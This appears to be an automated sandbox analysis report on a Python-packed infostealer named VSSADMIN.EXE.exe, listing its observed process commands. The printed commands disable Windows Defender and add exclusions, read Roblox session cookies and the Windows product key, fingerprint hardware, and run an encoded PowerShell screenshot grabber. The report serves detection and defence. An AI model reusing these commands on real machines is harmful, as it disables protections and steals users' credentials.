              Source: VSSADMIN.EXE.exe, 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exeBinary or memory string: OriginalFilenameVSSADMIN.EXEj% vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exeStatic PE information: invalid certificate
              Source: libcrypto-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9985088531464251
              Source: libssl-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9920135147270115
              Source: python311.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9993315999451067
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9977988591269841
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9943153231216458
              Source: VSSADMIN.EXE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@126/90@8/3
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C774E0 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF614C774E0
              Source: VSSADMIN.EXE.exeReversingLabs: Detection: 23%
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile read: C:\Users\user\Desktop\VSSADMIN.EXE.exeJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\VSSADMIN.EXE.exe C:\Users\user\Desktop\VSSADMIN.EXE.exe
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Users\user\Desktop\VSSADMIN.EXE.exe C:\Users\user\Desktop\VSSADMIN.EXE.exe
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTA
GMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCB6.tmp" "c:\Users\user\AppData\Local\Temp\ozweafg0\CSCCDFC3EC49286452EA176429826C32718.TMP"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe a -r -hp"Zsombec1234" "C:\Users\user\AppData\Local\Temp\7sLxM.zip" *
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Users\user\Desktop\VSSADMIN.EXE.exe C:\Users\user\Desktop\VSSADMIN.EXE.exe
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
